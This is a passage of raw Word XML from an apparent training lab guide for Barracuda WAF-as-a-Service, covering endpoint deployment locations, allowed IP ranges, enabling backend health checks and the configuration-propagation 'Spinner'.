        <w:t xml:space="preserve"> on the Internet</w:t>
      </w:r>
      <w:r w:rsidR="5C87814B">
        <w:rPr/>
        <w:t xml:space="preserve">, it will still </w:t>
      </w:r>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t xml:space="preserve">probably </w:t>
      </w:r>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t xml:space="preserve">will take 20 – 30 minutes for the updates to propagate throughout the global DNS hierarchy and we just don’t have that kind of time in this lab.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08036E22" w:rsidP="08036E22" w:rsidRDefault="08036E22" w14:paraId="28889D0F" w14:textId="63D0C9B3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="08036E22" w:rsidP="08036E22" w:rsidRDefault="08036E22" w14:paraId="4AE24BC8" w14:textId="22B271BC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="08036E22" w:rsidP="08036E22" w:rsidRDefault="08036E22" w14:paraId="30185335" w14:textId="74C9A5F5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="08036E22" w:rsidP="08036E22" w:rsidRDefault="08036E22" w14:paraId="4178B317" w14:textId="29CA7D0C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="08036E22" w:rsidP="08036E22" w:rsidRDefault="08036E22" w14:paraId="77033DB2" w14:textId="58F866B2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="48EF6EFD" w:rsidP="5BDB08D7" w:rsidRDefault="48EF6EFD" w14:paraId="11E7B26B" w14:textId="2FEDED1B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="48EF6EFD">
        <w:rPr/>
        <w:t>Endpoint Regions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A1D7C9D" w:rsidP="5BDB08D7" w:rsidRDefault="7A1D7C9D" w14:paraId="26BA3C7A" w14:textId="63118ABA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidR="7A1D7C9D">
        <w:rPr/>
        <w:t>There are no</w:t>
      </w:r>
      <w:r w:rsidR="76E4244B">
        <w:rPr/>
        <w:t xml:space="preserve"> lab</w:t>
      </w:r>
      <w:r w:rsidR="7A1D7C9D">
        <w:rPr/>
        <w:t xml:space="preserve"> steps to complete here, this is purely informational</w:t>
      </w:r>
      <w:r w:rsidR="30100245">
        <w:rPr/>
        <w:t xml:space="preserve"> because you will be doing this in a real customer engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48EF6EFD" w:rsidP="5BDB08D7" w:rsidRDefault="48EF6EFD" w14:paraId="008E5031" w14:textId="0425138C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="48EF6EFD">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="48EF6EFD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: Your </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="76C3A6A5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">students accounts are in a single test </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="2B17A3B3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>locat</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="76C3A6A5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ion </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="2B17A3B3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">hard-wired </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="76C3A6A5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">in North America.  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="76C3A6A5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="76C3A6A5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> because of that, your </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="48EF6EFD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Endpoints screen do</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="2E520B72">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="48EF6EFD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="48EF6EFD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NOT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="48EF6EFD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> show the additional the Deployment Location and IP Ranges to Allow as shown </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="0B65284F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37DDA01D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="111DA986">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Deployment Location is usually automatic</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="65638CC1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ally chosen closest to your servers based on your backend server IP address … </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="111DA986">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">but you can select a specific location where WAF-as-a-Service has a POP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="111DA986">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>( Point</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="111DA986">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="111DA986">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Prescense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="111DA986">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) for lower latency, compliance with rules such as GPDR, or for whatever reason the customer may wish.  </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37DDA01D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">IP Ranges to Allow are the IP Addresses facing the Backend Server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37DDA01D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>( aka</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37DDA01D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37DDA01D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>server )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37DDA01D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">.  The customer must allow these </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37DDA01D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IP’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37DDA01D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> through their firewall on whatever port their Backend Server listens on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D897F6D" w:rsidP="5BDB08D7" w:rsidRDefault="1D897F6D" w14:paraId="4AAE9310" w14:textId="0BF805B4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="1D897F6D">
        <w:rPr/>
        <w:t xml:space="preserve"> Documentation Link: </w:t>
      </w:r>
      <w:hyperlink r:id="R7af2cf586e5a43cf">
        <w:r w:rsidRPr="5BDB08D7" w:rsidR="1D897F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://campus.barracuda.com/product/WAAS/doc/91129005/understanding-deployment-locations/?sl=AXe3KDmUQVmzFRmBUd_j&amp;so=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="5BDB08D7" w:rsidP="5BDB08D7" w:rsidRDefault="5BDB08D7" w14:paraId="44F3183E" w14:textId="2725D0A8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6D65B94D" w:rsidP="5BDB08D7" w:rsidRDefault="6D65B94D" w14:paraId="1CDBBD88" w14:textId="17689F84">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="6D65B94D">
        <w:drawing>
          <wp:inline wp14:editId="34370F8C" wp14:anchorId="43BE3822">
            <wp:extent cx="5943600" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1472047546" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3a62714b80e4444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419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="78E068E2">
        <w:drawing>
          <wp:inline wp14:editId="7AEB005F" wp14:anchorId="5954FE25">
            <wp:extent cx="5943600" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1666916782" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R8855ec50a38e463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181350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="520BA0FC" w:rsidRDefault="520BA0FC" w14:paraId="64412529" w14:textId="2CF82CC6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="520BA0FC" w:rsidP="520BA0FC" w:rsidRDefault="520BA0FC" w14:paraId="3BA1E0C9" w14:textId="191A9481">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="317DAFAE" w:rsidP="520BA0FC" w:rsidRDefault="0E0CF8B7" w14:paraId="6C9328C0" w14:textId="3E0E6EF9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="3B01CB12">
        <w:rPr/>
        <w:t>Servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="317DAFAE" w:rsidP="520BA0FC" w:rsidRDefault="0E0CF8B7" w14:paraId="7211B03A" w14:textId="3185D453">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4654468E">
        <w:rPr/>
        <w:t>Click on “Servers” in the left-hand navigation tree.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="317DAFAE" w:rsidP="520BA0FC" w:rsidRDefault="0E0CF8B7" w14:paraId="3E50BBD0" w14:textId="54F1E6DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4654468E">
        <w:rPr/>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="0E0CF8B7">
        <w:rPr/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="1A3EC13C">
        <w:rPr/>
        <w:t xml:space="preserve">backend/origin server, </w:t>
      </w:r>
      <w:r w:rsidR="5D6D1257">
        <w:rPr/>
        <w:t>click on the 3 dots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="317DAFAE" w:rsidP="520BA0FC" w:rsidRDefault="0E0CF8B7" w14:paraId="6CCEFAF9" w14:textId="2356E636">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="7B2F63E7">
        <w:drawing>
          <wp:inline wp14:editId="2F8888CE" wp14:anchorId="3C577702">
            <wp:extent cx="4662654" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="975073372" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Re7528c8e191c4a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62654" cy="866775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E393629" w:rsidP="520BA0FC" w:rsidRDefault="7E393629" w14:paraId="02F4795F" w14:textId="636263CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7E393629">
        <w:rPr/>
        <w:t>Click on “Health Checks” and slide the “Enable Health Checks” button to “On” then click Save</w:t>
      </w:r>
      <w:r w:rsidR="0823B8C6">
        <w:rPr/>
        <w:t>.  Do not change any of the other settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E393629" w:rsidP="520BA0FC" w:rsidRDefault="7E393629" w14:paraId="3612B026" w14:textId="34B89D44">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="7E393629">
        <w:drawing>
          <wp:inline wp14:editId="4A48F683" wp14:anchorId="403011E6">
            <wp:extent cx="2638425" cy="2211372"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1813592335" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rbf0ea0fde0b64c7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638425" cy="2211372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E393629" w:rsidP="520BA0FC" w:rsidRDefault="7E393629" w14:paraId="10F047B6" w14:textId="599D8F4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7E393629">
        <w:rPr/>
        <w:t xml:space="preserve">Observe that the Health is now Up </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="7E393629">
        <w:rPr/>
        <w:t>( green</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="7E393629">
        <w:rPr/>
        <w:t xml:space="preserve"> check </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="7E393629">
        <w:rPr/>
        <w:t>mark )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="7E393629">
        <w:rPr/>
        <w:t xml:space="preserve"> as shown here</w:t>
      </w:r>
      <w:r w:rsidR="557825FF">
        <w:rPr/>
        <w:t>.  If it is not green, alert you instructor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E393629" w:rsidP="520BA0FC" w:rsidRDefault="7E393629" w14:paraId="17CAB4AB" w14:textId="7C0FEA62">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="7E393629">
        <w:drawing>
          <wp:inline wp14:editId="1FDCC132" wp14:anchorId="79CCCCD7">
            <wp:extent cx="4143375" cy="903043"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="477925661" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rdb342e0a819f433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43375" cy="903043"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="520BA0FC" w:rsidRDefault="32F6121D" w14:paraId="68E78084" w14:textId="0CE12034">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="5EEBCA99">
        <w:rPr/>
        <w:t>”T</w:t>
      </w:r>
      <w:r w:rsidR="36839191">
        <w:rPr/>
        <w:t>he Spinner</w:t>
      </w:r>
      <w:r w:rsidR="391E2FE6">
        <w:rPr/>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="520BA0FC" w:rsidRDefault="32F6121D" w14:paraId="7957A8FE" w14:textId="5F6D72B7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
      </w:pPr>
      <w:r w:rsidR="36839191">
        <w:rPr/>
        <w:t xml:space="preserve">A note on </w:t>
      </w:r>
      <w:r w:rsidR="619A8AB3">
        <w:rPr/>
        <w:t>“"T</w:t>
      </w:r>
      <w:r w:rsidR="36839191">
        <w:rPr/>
        <w:t xml:space="preserve">he Spinner” and why it is important.  </w:t>
      </w:r>
      <w:r w:rsidR="5A514103">
        <w:rPr/>
        <w:t xml:space="preserve">Observe at the top of the screen, there is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="5A514103">
        <w:rPr/>
        <w:t>a ”Spinner</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="5A514103">
        <w:rPr/>
        <w:t>” which</w:t>
      </w:r>
      <w:r w:rsidR="2A599EDF">
        <w:rPr/>
        <w:t xml:space="preserve">, when it is spinning, </w:t>
      </w:r>
      <w:r w:rsidR="5A514103">
        <w:rPr/>
        <w:t xml:space="preserve">indicates changes you have made are </w:t>
      </w:r>
      <w:r w:rsidR="688FBB66">
        <w:rPr/>
        <w:t xml:space="preserve">busy </w:t>
      </w:r>
      <w:r w:rsidR="5A514103">
        <w:rPr/>
        <w:t xml:space="preserve">propagating out to the WAFaaS </w:t>
      </w:r>
      <w:r w:rsidR="76DA6CA8">
        <w:rPr/>
        <w:t xml:space="preserve">POPS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="76DA6CA8">
        <w:rPr/>
        <w:t>( Points</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="76DA6CA8">
        <w:rPr/>
        <w:t>-of-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="76DA6CA8">
        <w:rPr/>
        <w:t>Prescence )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="76DA6CA8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5A514103">
        <w:rPr/>
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:r w:rsidR="51555834">
        <w:rPr/>
        <w:t xml:space="preserve">locations </w:t>
      </w:r>
      <w:r w:rsidR="5A514103">
        <w:rPr/>
        <w:t>you have selected.</w:t>
      </w:r>
      <w:r w:rsidR="5275FA34">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="2F554722">
        <w:rPr/>
        <w:t xml:space="preserve"> Please wait for the spinner to stop spinning before making additional changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="520BA0FC" w:rsidRDefault="32F6121D" w14:paraId="265125C8" w14:textId="664D64D1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
      </w:pPr>
      <w:r w:rsidR="5A514103">
        <w:rPr/>
        <w:t>Clicking on the “Spinner” results in a message box showing how much time remains for the changes to fully take effect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="520BA0FC" w:rsidRDefault="32F6121D" w14:paraId="239ABB88" w14:textId="307A8C11">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
      </w:pPr>
      <w:r w:rsidR="5A514103">
        <w:drawing>
          <wp:inline wp14:editId="6258AEEB" wp14:anchorId="2195CE55">
            <wp:extent cx="3692430" cy="1378744"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="766813260" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R53603964071846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92430" cy="1378744"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="5A514103">
        <w:drawing>
          <wp:inline wp14:editId="04EACBCB" wp14:anchorId="6508DEDC">
            <wp:extent cx="1766241" cy="1099203"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1657699548" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R479d6bc8866d45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766241" cy="1099203"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BDB08D7" w:rsidP="5BDB08D7" w:rsidRDefault="5BDB08D7" w14:paraId="6E8007E1" w14:textId="15A720D3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1FEADC78" w:rsidP="5BDB08D7" w:rsidRDefault="1FEADC78" w14:paraId="70DDD631" w14:textId="1ABF19AA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
